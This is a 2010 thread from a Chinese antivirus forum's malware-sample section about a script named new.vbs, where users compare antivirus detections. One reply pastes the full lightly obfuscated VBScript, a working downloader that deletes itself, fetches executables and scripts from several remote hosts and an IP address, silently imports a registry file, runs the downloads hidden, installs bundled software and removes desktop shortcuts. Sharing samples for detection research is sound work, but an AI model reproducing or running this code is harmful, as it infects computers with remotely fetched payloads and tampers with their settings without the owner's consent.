收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 new.vbs
123下一页
返回列表 发新帖
楼主: Sherry.ai
 收起左侧

[病毒样本] new.vbs

  [复制链接]
zhanghusen
发表于 2010-12-25 19:57:49 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

恋亿晓
发表于 2010-12-25 21:23:10 | 显示全部楼层
MSE kill
回复

举报

Killer_cg
发表于 2010-12-25 21:25:45 | 显示全部楼层
TO
回复

举报

留侯
发表于 2010-12-25 21:35:51 | 显示全部楼层
大蜘蛛clean,已上报!
回复

举报

dalianjhc1986
发表于 2010-12-25 22:39:15 | 显示全部楼层
回复 8楼 zuo 的帖子

你用的是什么软件 分析那么多 请教 最好说详细点呵呵
回复

举报

zuo
发表于 2010-12-25 22:40:00 | 显示全部楼层
回复 15楼 dalianjhc1986 的帖子

MD啊,一款HIPS
回复

举报

dalianjhc1986
发表于 2010-12-25 22:45:14 | 显示全部楼层
回复 16楼 zuo 的帖子

能给个下载的地址吗 或者你上传115u上 我想下个
回复

举报

zuo
发表于 2010-12-25 22:46:40 | 显示全部楼层
回复 17楼 dalianjhc1986 的帖子

去这里:http://bbs.kafan.cn/forum-80-1.html
下载网站:http://labs.360.cn/malwaredefender/
回复

举报

风亡
发表于 2010-12-25 22:53:51 | 显示全部楼层
360sdmiss 网盾报未知
回复

举报

yangpinghero
发表于 2010-12-25 23:54:50 | 显示全部楼层
红伞和金山卫士报无毒
脚本代码
on error resume next
a41031ug="http://se9.china.sogou.goo"
t2er80u9q="gle.baidu.com.baidu163so.info"
a41031ug=a41031ug + t2er80u9q
d540iou6="http://117.41.174.84:91"
fbj0vu7d="http://hao345.info:7241"
Set be4ua2w6= WScript.CreateObject("WScr"&"ipt.Sh"&"ell")
Set m1k8521a5 = Wscript.CreateObject("Script"&"ing.FileSystemO"&"bject")
cv3a54fk=be4ua2w6.ExpandEnvironmentStrings("%temp%")
w7rg6n5x = left(cv3a54fk,3)
m2s795nb1 = be4ua2w6.SpecialFolders("AppData") & "\Microsoft\Intern"&"et Explorer\Quic"&"k Launch"            '当前用户快速启动
w21x1v784="c:\Docume~1\All Us"&"ers\「开始」菜单"
be4ua2w6.Run("htt"&"p://w"&"ww.xs"&"p5.i"&"nfo/index8.htm")
be4ua2w6.run "C:\Progra~1\Intern~1\IEXPLORE.EXE http://ww"&"w.xs"&"p5.info/index/index8.htm",0

Sub c16e33b14(t1t1p4yor)
Set eghq96qd= CreateObject("scrip"&"ting.Fi"&"leSys"&"temObject")
If Not eghq96qd.FolderExists(t1t1p4yor) Then
  eghq96qd.CreateFolder t1t1p4yor
End If
Set eghq96qd = Nothing
end sub
w2794kll7="AD"&"ODB.Str"&"eam"
Call c16e33b14(w7rg6n5x&"Prog"&"ra~1\Win"&"RAR\ico")
ico1=w7rg6n5x&"Prog"&"ra~1\WinR"&"AR\ico\"
Sub gu0959b4(q1232wsd3,w1alrs823)
Set j1tkrm466 =CreateObject("M"&"ic"&"r"&"osoft.XM"&"L"&"H"&"T"&"T"&"P")
Set k1n5s2528 =CreateObject(w2794kll7)
with j1tkrm466
.Open "GET",q1232wsd3,0
.Send()
end with
b=j1tkrm466.responseBody
with k1n5s2528
.type = eval("1")
.Mode = eval("3")
.open()
.write eval("j1tkrm466.r"&"es"&"po"&"n"&"se"&"Bo"&"d"&"y")
.SaveToFile w1alrs823,eval ("2")
end with
k1n5s2528.close
end sub

Sub d125fdum4(e1uq74y8o,f149db0kf)
Set r11n4x23x = CreateObject("Script"&"ing.FileSyste"&"mObject")
If r11n4x23x.FileExists(e1uq74y8o) Then                        
       r11n4x23x.deletefile(e1uq74y8o)
End If
    Set g1k2s21h4=r11n4x23x.CreateTextFile(e1uq74y8o,False)
    g1k2s21h4.WriteLine(f149db0kf)
    g1k2s21h4.WriteLine("de"&"l %"&"0 ")
    g1k2s21h4.Close      
Set r11n4x23x  = Nothing
end sub

m1k8521a5.DeleteFile(WScript.ScriptName)

call gu0959b4(a41031ug&"/ico/tb.ico",ico1&"tb.ico")

call gu0959b4(a41031ug&"/go/ie.txt",cv3a54fk&"\ie.reg")
be4ua2w6.Run "regedit /s "&cv3a54fk&"\ie.reg"

call gu0959b4(a41031ug&"/go/hao.txt",cv3a54fk&"\xing.vbs")
be4ua2w6.Run "cmd.exe /c start "&cv3a54fk&"\xing.vbs",0,True

call gu0959b4(a41031ug&"/go/page.txt",cv3a54fk&"\page.vbs")
be4ua2w6.Run "cmd.exe /c start "&cv3a54fk&"\page.vbs",0,True

call gu0959b4(a41031ug&"/dy/tan.html",cv3a54fk&"\tan.exe")
be4ua2w6.Run "cmd.exe /c start "&cv3a54fk&"\tan.exe",0,True

call gu0959b4(d540iou6&"/1018new.exe",cv3a54fk&"\1018new.exe")
be4ua2w6.Run "cmd.exe /c start "&cv3a54fk&"\1018new.exe",0,True

call gu0959b4(fbj0vu7d&"/soft/aiqi4397.exe",cv3a54fk&"\aiqi4397.exe")
be4ua2w6.Run "cmd.exe /c start "&cv3a54fk&"\aiqi4397.exe",0,True

call gu0959b4(a41031ug&"/dy/cpa.html",cv3a54fk&"\cpa.exe")
be4ua2w6.Run "cmd.exe /c start "&cv3a54fk&"\cpa.exe",0,True

call gu0959b4("ht"&"t"&"p://d"&"ownloa"&"d13.subo.m"&"e/91"&"58/91"&"58chat_395"&"784.exe",cv3a54fk&"\9158chat_395784.exe")
be4ua2w6.Run cv3a54fk&"\9158chat_395784.exe  /SILENT", , True
m1k8521a5.DeleteFile "C:\Docume~1\All Users\桌面\9158多人视频.lnk" ,true
m1k8521a5.DeleteFile "C:\Docume~1\Admini~1\桌面\9158多人视频.lnk" ,true
m1k8521a5.DeleteFile "C:\Docume~1\Admini~1\桌面\呱呱歌舞视频.lnk" ,true
m1k8521a5.DeleteFile "C:\Docume~1\Admini~1\桌面\可乐视频社区.lnk" ,true
m1k8521a5.DeleteFile "C:\Docume~1\Admini~1\桌面\呱呱K歌伴侣.lnk" ,true

call gu0959b4("h"&"t"&"tp://down"&"load13.su"&"bo.me/t"&"58/t5"&"8chat_395"&"794.exe",cv3a54fk&"\t58chat_395784.exe")
be4ua2w6.Run cv3a54fk&"\t58chat_395784.exe  /SILENT", , True
m1k8521a5.DeleteFile "C:\Docume~1\Admini~1\桌面\跳舞吧.lnk" ,true
m1k8521a5.DeleteFile "C:\Docume~1\All Users\桌面\跳舞吧.lnk" ,true
m1k8521a5.DeleteFile m2s795nb1&"\跳舞吧多人视频空间.lnk" ,true

be4ua2w6.Run "h"&"t"&"t"&"p:/"&"/w"&"ww.mmtp5.info/dy2.html"
call gu0959b4("h"&"tt"&"p://n"&"eirong.funsh"&"ion.com/down"&"load/sil"&"ent/6042"&"3/Funshi"&"onInstall.exe",cv3a54fk&"\Funshi"&"onInstall.exe")
be4ua2w6.Run "cmd.exe /c start "&cv3a54fk&"\Funshi"&"onInstall.exe",0,True

WScript.Sleep 10000
m1k8521a5.DeleteFile "C:\Docume~1\All Users\桌面\购物网站大全.lnk" ,true
m1k8521a5.DeleteFile "C:\Docume~1\All Users\桌面\热门游戏.lnk" ,true
m1k8521a5.DeleteFile "C:\Docume~1\All Users\桌面\风行.lnk" ,true

WScript.Sleep 1000000
be4ua2w6.Run "h"&"t"&"t"&"p:/"&"/w"&"ww.cryx.info/sogou/vipdy.html?ss"
be4ua2w6.Run "C:\Progra~1\Funshi~1\Funshion\Funshion.exe", , True
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-14 18:09 , Processed in 0.098136 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表